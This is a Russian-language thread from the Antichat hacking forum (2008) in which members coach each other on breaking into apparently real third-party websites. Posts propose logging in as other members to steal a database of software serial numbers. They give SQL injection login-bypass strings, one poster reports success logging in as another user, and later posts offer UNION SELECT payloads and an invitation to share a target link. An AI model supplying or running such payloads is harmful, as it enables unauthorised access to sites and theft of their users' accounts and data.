10.06.2008, 19:47
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
1SeTh, никакого))
Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.
|
|
|
10.06.2008, 20:28
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами:
10646246
Репутация:
34
|
|
да ты прав, можно нахляву получить серийники, только мемберов то я незнаю )
еще не понятно тогда как админ редактирует контент?
Последний раз редактировалось 1SeTh; 10.06.2008 в 20:32..
|
|
|
|
10.06.2008, 22:07
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
|
|
|
|
10.06.2008, 22:28
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами:
10646246
Репутация:
34
|
|
Сообщение от AFoST
1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь.
вместо слово сергей поставил пару американских имен все равно заходить под логином Admin 
|
|
|
|
10.06.2008, 23:14
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
1SeTh, я зашел под другим логином 
вбиваем
pizda' or password like '%9%'/*
pizda' or password like '%9%'/*
входим под grease2
=)))) |
|
|
|
10.06.2008, 23:33
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
Как можно обойти?
И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?
Последний раз редактировалось Imperou$; 10.06.2008 в 23:41..
|
|
|
|
10.06.2008, 23:39
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
пробуй
ID=-1+UNION+SELECT+1,2,3/*
или
ID=19+and+1=0+UNION+SELECT+1,2,3/*
|
|
|
|
10.06.2008, 23:56
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
2 AFoST
К сожалению не прокатило. Но все равно спасибо за совет.
|
|
|
|
10.06.2008, 23:57
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Imperou$
давай ссылку, и будет гораздо проще
|
|
|
|
10.06.2008, 23:58
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
jokester, именно
Imperou$, давай ссылку-будем вдуплять |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
